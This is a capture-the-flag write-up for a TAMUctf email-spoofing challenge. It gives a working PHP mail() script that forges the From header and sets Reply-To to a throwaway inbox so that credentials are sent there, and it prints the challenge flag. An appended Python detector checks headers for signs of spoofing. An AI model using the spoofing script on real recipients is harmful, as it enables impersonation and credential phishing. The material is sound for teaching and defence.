[MISC] TAMUctf - Onboarding Checklist

Onboarding Checklist
465

Description:
From: importantperson@somebigcorp.com
Date: Feb 22, 2019 9:00 AM
To: someguy@somebigcorp.com
Subject: New Employee Access

Hello Some Guy,
We need to begin sending requests for the new employee to get access to our security appliances. I believe they already know that you are authorized to make a new account request. Would you mind sending the new employee’s email address to tamuctf@gmail.com so they can process the account request?
Thank you,
Important Person

The new employee can be a little slow to respond.

Difficulty: easy

2/26 8:42 am CST: Visiting somebigcorp.com is not part of the challenge

The goal of this challenge is clear: send an email to tamuctf@gmail.com requesting the credentials for the new employee. However, the request has to look as if it came from someguy@somebigcorp.com, the person authorized to make it. How?

*Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source.*

To use this technique there is a perfect PHP function called mail(). All we need is a PHP server and an email server (look up how to set one up if you don't know how).

```php
<?php
// Signature of PHP's mail(); the last two parameters are optional
mail(string $to, string $subject, string $message, array|string $additional_headers = [], string $additional_parameters = ""): bool
?>
```

The most important parameters in this case are the From and Reply-To additional headers. In From we put the address we want to spoof, and in Reply-To we put the address where we want the people we fooled, in this case tamuctf@gmail.com, to send their replies.

So to retrieve the flag all we need is:

  • PHP Server
  • Email Server
  • An email where we can receive the credentials (let’s call it examplemail@10minutemail.com)
  • Call the PHP mail() function from the server.
  • Put the address where we want to receive the credentials in the body of the mail() message

Let’s create the file imnotspoofing.php with the following content:

```php
<?php

$to = 'tamuctf@gmail.com';
$subject = 'Requesting new employee credentials';
// The reply address is repeated in the body in case Reply-To is ignored
$message = 'Hello. I am requesting the new employee credentials. Can you send them to my email examplemail@10minutemail.com. Thanks';
$headers = array(
    'From: someguy@somebigcorp.com',          // the spoofed sender
    'Reply-To: examplemail@10minutemail.com', // where replies actually go
    'X-Mailer: PHP/' . phpversion()
);
// Extra headers must be separated by CRLF
mail($to, $subject, $message, implode("\r\n", $headers));

?>
```

Shortly after running this PHP script on our server, we receive an email at examplemail@10minutemail.com with the flag:

FLAG: gigem{wuT_4n_31337_sp0ofer_494C4F5645594F55}
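From the receiving side, the headers this script forges are exactly the ones a mail gateway or analyst can compare. The following Python example is added here and is not part of the original write-up: it parses a constructed message resembling the one above and lists the indicators a defender looks for, namely Reply-To and Return-Path domains that differ from the visible From, and SPF/DKIM/DMARC results that are missing or not "pass" in the receiving server's Authentication-Results header. The header names are standard; the sample message and host names are made up.

```python
"""Flag messages whose visible From: disagrees with Reply-To:/Return-Path:,
or whose Authentication-Results: header lacks a passing SPF/DKIM/DMARC result."""
import email
import re
from email.utils import parseaddr


def _domain(header_value):
    """Return the lower-cased domain of an address header, or None if absent."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower() or None


def spoof_indicators(raw_message):
    """Return a list of human-readable indicators found in a raw RFC 5322 message."""
    msg = email.message_from_string(raw_message)
    indicators = []
    from_dom = _domain(msg.get("From"))
    # The write-up's trick: From says somebigcorp.com, replies go elsewhere.
    for hdr in ("Reply-To", "Return-Path"):
        dom = _domain(msg.get(hdr))
        if dom and from_dom and dom != from_dom:
            indicators.append(f"{hdr} domain {dom} differs from From domain {from_dom}")
    # Authentication-Results is written by the receiving MTA, not the sender.
    auth = msg.get("Authentication-Results", "")
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth, re.I)
        if not m:
            indicators.append(f"no {mech} result recorded")
        elif m.group(1).lower() != "pass":
            indicators.append(f"{mech}={m.group(1).lower()}")
    return indicators


# Constructed sample resembling the spoofed request above (not a real capture).
SAMPLE = """Return-Path: <www-data@php-host.example>
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=php-host.example; dkim=none; dmarc=fail header.from=somebigcorp.com
From: someguy@somebigcorp.com
Reply-To: examplemail@10minutemail.com
To: tamuctf@gmail.com
Subject: Requesting new employee credentials

Hello. Please send the new employee credentials to examplemail@10minutemail.com.
"""

if __name__ == "__main__":
    for line in spoof_indicators(SAMPLE):
        print("!", line)
```

A message that passes all three checks and whose Reply-To matches From yields an empty list, so the function can sit directly in a gateway rule or a triage script.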